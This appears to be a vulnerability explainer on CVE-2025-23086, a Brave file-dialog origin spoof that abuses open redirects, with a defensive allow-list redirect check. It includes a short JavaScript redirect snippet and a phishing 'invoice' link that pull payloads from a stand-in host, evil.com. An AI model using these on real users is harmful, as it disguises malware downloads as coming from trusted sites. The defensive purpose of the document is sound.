A newly reported vulnerability — CVE-2025-23086 — has been found in Brave Browser for desktop (versions 1.70.x through 1.73.x). This bug lets malicious websites mislead users about the true source of a file upload or download using a combination of Brave’s file selector dialog and a crafty open redirect trick. In simple terms, it makes malware or phishing downloads look like they’re coming from a trusted site.

Let’s break down what went wrong, how the exploitation works, and how to stay safe.

How Did This Vulnerability Happen?

Starting with Brave 1.70.x, the browser tried to be transparent about where file upload/download prompts are coming from. Whenever a site asks the user to select a file (for uploading) or triggers a download, Brave shows the site’s origin inside the file selector dialog. That’s a great feature, *if* the origin is displayed correctly.

But sometimes Brave showed the _wrong_ origin. In particular, when one site redirected the user to the file operation, Brave could show the redirecting site's origin in the dialog rather than the origin that actually serves the file. If attackers can make use of an _open redirect_ vulnerability on a trusted site, they can start a file download that APPEARS to originate from that trusted site—when it really comes from the attacker’s malicious site.

Glossary

- Origin: The domain (like https://goodbank.com) from which a request was made.
- Open Redirect: A security bug where a site allows users to be redirected to external sites, often used in phishing.

https://goodbank.com/redirect?url=https://malicious.site/download-malware.exe

If GoodBank.com’s /redirect endpoint is an open redirect, it bounces you instantly to https://malicious.site/download-malware.exe.

What Brave Did (with CVE-2025-23086)

When the file download dialog pops up, Brave will show “goodbank.com” as the origin in the OS file picker dialog—not “malicious.site”—even though the *actual file* comes from the attacker’s domain.

Assume

- trusted.com is a reputable site with an open redirect at /redirect

https://trusted.com/redirect?url=https://evil.com/payload.exe

3. The browser is sent to trusted.com, then instantly redirected to evil.com/payload.exe.
4. Brave’s file download dialog appears, but its origin message says: _“trusted.com wants to download a file”_.

Poisoned Trust

Users are much more likely to trust a file download initiated seemingly by a reputable site. With CVE-2025-23086, attackers gain a social engineering advantage: disguising their file downloads as coming from any site with an open redirect.

Technical Snippet

Here’s how attackers can use JavaScript to exploit this, assuming cross-origin downloads are allowed:

// On evil.com
const trustedRedirect = "https://trusted.com/redirect?url=" + encodeURIComponent("https://evil.com/payload.exe");
window.location.href = trustedRedirect;
// Brave will show 'trusted.com' as the download origin in the file selector dialog!

<!-- Phishing page on evil.com -->
<a href="https://trusted.com/redirect?url=https://evil.com/malware.zip" download>
  Click here to download your invoice
</a>

The file dialog will show:

"trusted.com wants to download a file"
(not evil.com!)

For Users

- Update your Brave Browser: Brave fixed this vulnerability after v1.73.x. Install the latest version.
- Be careful with download prompts: Never trust the origin shown on the file dialog alone.
- Watch for suspicious links: If a download comes through a redirect, be suspicious—even if it looks “trusted.”

Use a whitelist

More info: Preventing Open Redirects
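As an added example of the whitelist advice (not code from this post or from Brave), here is a Node.js check for a /redirect?url=... endpoint that only forwards to allow-listed origins, so a trusted site can no longer be used to bounce visitors to an attacker's download. trusted.com, docs.trusted.com and evil.com are placeholder names.

```javascript
// Added example: allow-list check for a /redirect?url=... endpoint (Node.js, WHATWG URL).
// Not Brave's or the post author's code; the host names below are constructed placeholders.

const SITE_ORIGIN = "https://trusted.com";                                  // the redirecting site (assumed)
const ALLOWED_ORIGINS = new Set([SITE_ORIGIN, "https://docs.trusted.com"]); // allow-list (assumed)
const FALLBACK = "/";                                                       // where rejected targets land

// Returns the redirect target to use for a raw `url` query parameter, or FALLBACK
// when the parameter does not resolve to an allow-listed origin.
function safeRedirectTarget(rawUrl) {
  if (typeof rawUrl !== "string" || rawUrl.length === 0) return FALLBACK;
  let target;
  try {
    // Relative paths resolve against our own origin; absolute URLs keep theirs.
    target = new URL(rawUrl, SITE_ORIGIN);
  } catch {
    return FALLBACK; // unparsable input
  }
  // Only http(s) may be a redirect target; javascript:, data:, etc. are rejected.
  if (target.protocol !== "https:" && target.protocol !== "http:") return FALLBACK;
  // Compare the parsed origin, never a string prefix: "https://trusted.com.evil.com"
  // and "https://trusted.com@evil.com" both parse to a different origin,
  // and "//evil.com/x" resolves to evil.com, not to us.
  if (!ALLOWED_ORIGINS.has(target.origin)) return FALLBACK;
  // Never forward embedded credentials, even for an allow-listed host.
  if (target.username || target.password) return FALLBACK;
  return target.href;
}
```

Because the allow-list holds full origins, an http:// variant of an allowed host is rejected as well, which also blocks a downgrade through the redirect.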

Conclusion

CVE-2025-23086 is a clever trick: it combines browser UI design and a common web security misconfiguration (open redirects) to fool users about the origin of file uploads/downloads. Even vigilant users can be fooled by this, because their browser appears to confirm that the download comes from a trusted, familiar site.

The fix is out, but the lesson is lasting:
Never trust file dialogs blindly, keep your browser updated, and treat any site that allows open redirects with skepticism when it comes to downloads or uploads.


*Stay safe on the web! Update now. And don’t click strange download links—even from your bank.*

Timeline

Published on: 01/21/2025 05:15:07 UTC
Last modified on: 01/21/2025 15:15:14 UTC